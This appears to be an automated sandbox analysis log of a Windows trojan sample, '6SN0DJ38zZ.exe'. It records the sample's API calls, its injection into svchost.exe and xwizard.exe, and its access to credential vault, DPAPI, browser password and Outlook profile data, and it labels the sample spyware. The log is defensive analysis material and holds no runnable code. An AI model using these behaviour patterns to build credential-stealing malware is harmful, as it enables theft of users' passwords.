Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03472D00 NtSetInformationFile,	7_2_03472D00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03472D10 NtMapViewOfSection,	7_2_03472D10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03472D30 NtUnmapViewOfSection,	7_2_03472D30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03472DD0 NtDelayExecution,	7_2_03472DD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03472DB0 NtEnumerateKey,	7_2_03472DB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03472C60 NtCreateKey,	7_2_03472C60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03472C70 NtFreeVirtualMemory,	7_2_03472C70
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03472C00 NtQueryInformationProcess,	7_2_03472C00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03472CC0 NtQueryVirtualMemory,	7_2_03472CC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03472CF0 NtOpenProcess,	7_2_03472CF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03472CA0 NtQueryInformationToken,	7_2_03472CA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03473010 NtOpenDirectoryObject,	7_2_03473010
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03473090 NtSetValueKey,	7_2_03473090
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034739B0 NtGetContextThread,	7_2_034739B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03473D70 NtOpenThread,	7_2_03473D70
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03473D10 NtOpenProcessToken,	7_2_03473D10

Source: C:\Users\user\Desktop\6SN0DJ38zZ.exe

Code function: 0_2_009EA1EF: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,

0_2_009EA1EF

Source: C:\Users\user\Desktop\6SN0DJ38zZ.exe

Code function: 0_2_009D8310 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

0_2_009D8310

Source: C:\Users\user\Desktop\6SN0DJ38zZ.exe

Code function: 0_2_009E51BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,

0_2_009E51BD

Source: C:\Users\user\Desktop\6SN0DJ38zZ.exe	Code function: 0_2_0098E6A0	0_2_0098E6A0
Source: C:\Users\user\Desktop\6SN0DJ38zZ.exe	Code function: 0_2_009AD975	0_2_009AD975
Source: C:\Users\user\Desktop\6SN0DJ38zZ.exe	Code function: 0_2_0098FCE0	0_2_0098FCE0
Source: C:\Users\user\Desktop\6SN0DJ38zZ.exe	Code function: 0_2_009A21C5	0_2_009A21C5
Source: C:\Users\user\Desktop\6SN0DJ38zZ.exe	Code function: 0_2_009B62D2	0_2_009B62D2
Source: C:\Users\user\Desktop\6SN0DJ38zZ.exe	Code function: 0_2_00A003DA	0_2_00A003DA
Source: C:\Users\user\Desktop\6SN0DJ38zZ.exe	Code function: 0_2_009B242E	0_2_009B242E
Source: C:\Users\user\Desktop\6SN0DJ38zZ.exe	Code function: 0_2_009A25FA	0_2_009A25FA
Source: C:\Users\user\Desktop\6SN0DJ38zZ.exe	Code function: 0_2_009966E1	0_2_009966E1
Source: C:\Users\user\Desktop\6SN0DJ38zZ.exe	Code function: 0_2_009DE616	0_2_009DE616
Source: C:\Users\user\Desktop\6SN0DJ38zZ.exe	Code function: 0_2_009B878F	0_2_009B878F
Source: C:\Users\user\Desktop\6SN0DJ38zZ.exe	Code function: 0_2_009E8889	0_2_009E8889
Source: C:\Users\user\Desktop\6SN0DJ38zZ.exe	Code function: 0_2_00998808	0_2_00998808
Source: C:\Users\user\Desktop\6SN0DJ38zZ.exe	Code function: 0_2_009B6844	0_2_009B6844
Source: C:\Users\user\Desktop\6SN0DJ38zZ.exe	Code function: 0_2_00A00857	0_2_00A00857
Source: C:\Users\user\Desktop\6SN0DJ38zZ.exe	Code function: 0_2_009ACB21	0_2_009ACB21
Source: C:\Users\user\Desktop\6SN0DJ38zZ.exe	Code function: 0_2_009B6DB6	0_2_009B6DB6
Source: C:\Users\user\Desktop\6SN0DJ38zZ.exe	Code function: 0_2_00996F9E	0_2_00996F9E
Source: C:\Users\user\Desktop\6SN0DJ38zZ.exe	Code function: 0_2_00993030	0_2_00993030
Source: C:\Users\user\Desktop\6SN0DJ38zZ.exe	Code function: 0_2_009A3187	0_2_009A3187
Source: C:\Users\user\Desktop\6SN0DJ38zZ.exe	Code function: 0_2_009AF1D9	0_2_009AF1D9
Source: C:\Users\user\Desktop\6SN0DJ38zZ.exe	Code function: 0_2_00981287	0_2_00981287
Source: C:\Users\user\Desktop\6SN0DJ38zZ.exe	Code function: 0_2_009A1484	0_2_009A1484
Source: C:\Users\user\Desktop\6SN0DJ38zZ.exe	Code function: 0_2_00995520	0_2_00995520
Source: C:\Users\user\Desktop\6SN0DJ38zZ.exe	Code function: 0_2_009A7696	0_2_009A7696
Source: C:\Users\user\Desktop\6SN0DJ38zZ.exe	Code function: 0_2_00995760	0_2_00995760
Source: C:\Users\user\Desktop\6SN0DJ38zZ.exe	Code function: 0_2_009A1978	0_2_009A1978
Source: C:\Users\user\Desktop\6SN0DJ38zZ.exe	Code function: 0_2_009B9AB5	0_2_009B9AB5
Source: C:\Users\user\Desktop\6SN0DJ38zZ.exe	Code function: 0_2_009A1D90	0_2_009A1D90
Source: C:\Users\user\Desktop\6SN0DJ38zZ.exe	Code function: 0_2_009ABDA6	0_2_009ABDA6
Source: C:\Users\user\Desktop\6SN0DJ38zZ.exe	Code function: 0_2_00A07DDB	0_2_00A07DDB
Source: C:\Users\user\Desktop\6SN0DJ38zZ.exe	Code function: 0_2_00993FE0	0_2_00993FE0
Source: C:\Users\user\Desktop\6SN0DJ38zZ.exe	Code function: 0_2_0098DF00	0_2_0098DF00
Source: C:\Users\user\Desktop\6SN0DJ38zZ.exe	Code function: 0_2_013FE0E0	0_2_013FE0E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_00418503	7_2_00418503
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_00401000	7_2_00401000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0040E017	7_2_0040E017
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0040E023	7_2_0040E023
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_004030A0	7_2_004030A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_00401120	7_2_00401120
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0042EC63	7_2_0042EC63
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0040FCD3	7_2_0040FCD3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_00402D40	7_2_00402D40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_00402D3A	7_2_00402D3A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0040DED3	7_2_0040DED3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0040FEF3	7_2_0040FEF3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_00402680	7_2_00402680
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_00416713	7_2_00416713
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034FA352	7_2_034FA352
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0344E3F0	7_2_0344E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_035003E6	7_2_035003E6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034E0274	7_2_034E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034C02C0	7_2_034C02C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034C8158	7_2_034C8158
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03430100	7_2_03430100
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034DA118	7_2_034DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034F81CC	7_2_034F81CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034F41A2	7_2_034F41A2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_035001AA	7_2_035001AA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034D2000	7_2_034D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03464750	7_2_03464750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03440770	7_2_03440770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0343C7C0	7_2_0343C7C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0345C6E0	7_2_0345C6E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03440535	7_2_03440535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03500591	7_2_03500591
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034F2446	7_2_034F2446
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034E4420	7_2_034E4420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034EE4F6	7_2_034EE4F6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034FAB40	7_2_034FAB40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034F6BD7	7_2_034F6BD7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0343EA80	7_2_0343EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03456962	7_2_03456962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034429A0	7_2_034429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0350A9A6	7_2_0350A9A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0344A840	7_2_0344A840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03442840	7_2_03442840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0346E8F0	7_2_0346E8F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034268B8	7_2_034268B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034B4F40	7_2_034B4F40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03482F28	7_2_03482F28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03460F30	7_2_03460F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034E2F30	7_2_034E2F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03432FC8	7_2_03432FC8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0344CFE0	7_2_0344CFE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034BEFA0	7_2_034BEFA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03440E59	7_2_03440E59
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034FEE26	7_2_034FEE26
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034FEEDB	7_2_034FEEDB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03452E90	7_2_03452E90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034FCE93	7_2_034FCE93
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0344AD00	7_2_0344AD00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034DCD1F	7_2_034DCD1F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0343ADE0	7_2_0343ADE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03458DBF	7_2_03458DBF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03440C00	7_2_03440C00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03430CF2	7_2_03430CF2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034E0CB5	7_2_034E0CB5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0342D34C	7_2_0342D34C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034F132D	7_2_034F132D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0348739A	7_2_0348739A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0345B2C0	7_2_0345B2C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034E12ED	7_2_034E12ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034452A0	7_2_034452A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0347516C	7_2_0347516C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0342F172	7_2_0342F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0350B16B	7_2_0350B16B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0344B1B0	7_2_0344B1B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034EF0CC	7_2_034EF0CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034470C0	7_2_034470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034F70E9	7_2_034F70E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034FF0E0	7_2_034FF0E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034FF7B0	7_2_034FF7B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03485630	7_2_03485630
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034F16CC	7_2_034F16CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034F7571	7_2_034F7571
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_035095C3	7_2_035095C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034DD5B0	7_2_034DD5B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03431460	7_2_03431460
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034FF43F	7_2_034FF43F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034FFB76	7_2_034FFB76
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034B5BF0	7_2_034B5BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0347DBF9	7_2_0347DBF9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0345FB80	7_2_0345FB80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034FFA49	7_2_034FFA49
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034F7A46	7_2_034F7A46
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034B3A6C	7_2_034B3A6C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034EDAC6	7_2_034EDAC6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034DDAAC	7_2_034DDAAC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03485AA0	7_2_03485AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034E1AA3	7_2_034E1AA3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03449950	7_2_03449950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0345B950	7_2_0345B950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034D5910	7_2_034D5910
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034AD800	7_2_034AD800
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034438E0	7_2_034438E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034FFF09	7_2_034FFF09
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03441F92	7_2_03441F92
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034FFFB1	7_2_034FFFB1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03449EB0	7_2_03449EB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_03443D40	7_2_03443D40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034F1D5A	7_2_034F1D5A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034F7D73	7_2_034F7D73
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0345FDC0	7_2_0345FDC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034B9C32	7_2_034B9C32
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_034FFCF2	7_2_034FFCF2
Source: C:\Program Files (x86)\aGfrAXTxukIoQzgHdvJACPkNicehUzYmYvIPpYLYqwfCLap\gmbrlAYBeQOw.exe	Code function: 10_2_0341B9CA	10_2_0341B9CA
Source: C:\Program Files (x86)\aGfrAXTxukIoQzgHdvJACPkNicehUzYmYvIPpYLYqwfCLap\gmbrlAYBeQOw.exe	Code function: 10_2_0341BB66	10_2_0341BB66
Source: C:\Program Files (x86)\aGfrAXTxukIoQzgHdvJACPkNicehUzYmYvIPpYLYqwfCLap\gmbrlAYBeQOw.exe	Code function: 10_2_0341BB72	10_2_0341BB72
Source: C:\Program Files (x86)\aGfrAXTxukIoQzgHdvJACPkNicehUzYmYvIPpYLYqwfCLap\gmbrlAYBeQOw.exe	Code function: 10_2_0341DA42	10_2_0341DA42
Source: C:\Program Files (x86)\aGfrAXTxukIoQzgHdvJACPkNicehUzYmYvIPpYLYqwfCLap\gmbrlAYBeQOw.exe	Code function: 10_2_03424262	10_2_03424262
Source: C:\Program Files (x86)\aGfrAXTxukIoQzgHdvJACPkNicehUzYmYvIPpYLYqwfCLap\gmbrlAYBeQOw.exe	Code function: 10_2_0341BA22	10_2_0341BA22
Source: C:\Program Files (x86)\aGfrAXTxukIoQzgHdvJACPkNicehUzYmYvIPpYLYqwfCLap\gmbrlAYBeQOw.exe	Code function: 10_2_03426052	10_2_03426052
Source: C:\Program Files (x86)\aGfrAXTxukIoQzgHdvJACPkNicehUzYmYvIPpYLYqwfCLap\gmbrlAYBeQOw.exe	Code function: 10_2_0341D822	10_2_0341D822
Source: C:\Program Files (x86)\aGfrAXTxukIoQzgHdvJACPkNicehUzYmYvIPpYLYqwfCLap\gmbrlAYBeQOw.exe	Code function: 10_2_0343C7B2	10_2_0343C7B2

Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 034AEA12 appears 86 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 0342B970 appears 277 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03475130 appears 58 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03487E54 appears 111 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 034BF290 appears 105 times
Source: C:\Users\user\Desktop\6SN0DJ38zZ.exe	Code function: String function: 00987DE1 appears 35 times
Source: C:\Users\user\Desktop\6SN0DJ38zZ.exe	Code function: String function: 009A8900 appears 42 times
Source: C:\Users\user\Desktop\6SN0DJ38zZ.exe	Code function: String function: 009A0AE3 appears 70 times

Source: 6SN0DJ38zZ.exe, 00000000.00000003.1286801013.0000000003D03000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs 6SN0DJ38zZ.exe
Source: 6SN0DJ38zZ.exe, 00000000.00000003.1286513641.0000000003EAD000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs 6SN0DJ38zZ.exe

Source: 6SN0DJ38zZ.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@7/3@2/1

Source: C:\Users\user\Desktop\6SN0DJ38zZ.exe

Code function: 0_2_009EA06A GetLastError,FormatMessageW,

0_2_009EA06A

Source: C:\Users\user\Desktop\6SN0DJ38zZ.exe	Code function: 0_2_009D81CB AdjustTokenPrivileges,CloseHandle,		0_2_009D81CB
Source: C:\Users\user\Desktop\6SN0DJ38zZ.exe	Code function: 0_2_009D87E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,		0_2_009D87E1

Source: C:\Users\user\Desktop\6SN0DJ38zZ.exe

Code function: 0_2_009EB3FB SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,

0_2_009EB3FB

Source: C:\Users\user\Desktop\6SN0DJ38zZ.exe

Code function: 0_2_009FEE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

0_2_009FEE0D

Source: C:\Users\user\Desktop\6SN0DJ38zZ.exe

Code function: 0_2_009EC397 CoInitialize,CoCreateInstance,CoUninitialize,

0_2_009EC397

Source: C:\Users\user\Desktop\6SN0DJ38zZ.exe

Code function: 0_2_00984E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

0_2_00984E89

Source: C:\Users\user\Desktop\6SN0DJ38zZ.exe

File created: C:\Users\user~1\AppData\Local\Temp\aut83CF.tmp

Jump to behavior

Source: 6SN0DJ38zZ.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\6SN0DJ38zZ.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: xwizard.exe, 0000000B.00000002.2011770256.00000000032EE000.00000004.00000020.00020000.00000000.sdmp, xwizard.exe, 0000000B.00000002.2011770256.00000000032E3000.00000004.00000020.00020000.00000000.sdmp, xwizard.exe, 0000000B.00000002.2011770256.0000000003313000.00000004.00000020.00020000.00000000.sdmp, xwizard.exe, 0000000B.00000003.1949147508.00000000032E3000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: unknown	Process created: C:\Users\user\Desktop\6SN0DJ38zZ.exe "C:\Users\user\Desktop\6SN0DJ38zZ.exe"
Source: C:\Users\user\Desktop\6SN0DJ38zZ.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\6SN0DJ38zZ.exe"
Source: C:\Program Files (x86)\aGfrAXTxukIoQzgHdvJACPkNicehUzYmYvIPpYLYqwfCLap\gmbrlAYBeQOw.exe	Process created: C:\Windows\SysWOW64\xwizard.exe "C:\Windows\SysWOW64\xwizard.exe"
Source: C:\Windows\SysWOW64\xwizard.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\6SN0DJ38zZ.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\6SN0DJ38zZ.exe"	Jump to behavior
Source: C:\Program Files (x86)\aGfrAXTxukIoQzgHdvJACPkNicehUzYmYvIPpYLYqwfCLap\gmbrlAYBeQOw.exe	Process created: C:\Windows\SysWOW64\xwizard.exe "C:\Windows\SysWOW64\xwizard.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\xwizard.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\6SN0DJ38zZ.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\6SN0DJ38zZ.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\6SN0DJ38zZ.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\6SN0DJ38zZ.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\6SN0DJ38zZ.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\6SN0DJ38zZ.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\6SN0DJ38zZ.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\6SN0DJ38zZ.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\6SN0DJ38zZ.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\6SN0DJ38zZ.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\6SN0DJ38zZ.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\6SN0DJ38zZ.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\xwizard.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\xwizard.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\xwizard.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\xwizard.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\xwizard.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\xwizard.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\xwizard.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\xwizard.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\xwizard.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\xwizard.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\xwizard.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\xwizard.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\xwizard.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\xwizard.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\xwizard.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\xwizard.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\xwizard.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\xwizard.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\xwizard.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\xwizard.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\xwizard.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\xwizard.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\xwizard.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\aGfrAXTxukIoQzgHdvJACPkNicehUzYmYvIPpYLYqwfCLap\gmbrlAYBeQOw.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\aGfrAXTxukIoQzgHdvJACPkNicehUzYmYvIPpYLYqwfCLap\gmbrlAYBeQOw.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\aGfrAXTxukIoQzgHdvJACPkNicehUzYmYvIPpYLYqwfCLap\gmbrlAYBeQOw.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\aGfrAXTxukIoQzgHdvJACPkNicehUzYmYvIPpYLYqwfCLap\gmbrlAYBeQOw.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\aGfrAXTxukIoQzgHdvJACPkNicehUzYmYvIPpYLYqwfCLap\gmbrlAYBeQOw.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\aGfrAXTxukIoQzgHdvJACPkNicehUzYmYvIPpYLYqwfCLap\gmbrlAYBeQOw.exe	Section loaded: rasadhlp.dll	Jump to behavior

Source: C:\Windows\SysWOW64\xwizard.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\xwizard.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Jump to behavior

Source: 6SN0DJ38zZ.exe

Static file information: File size 1201665 > 1048576

Source: 6SN0DJ38zZ.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: 6SN0DJ38zZ.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: 6SN0DJ38zZ.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: 6SN0DJ38zZ.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: 6SN0DJ38zZ.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
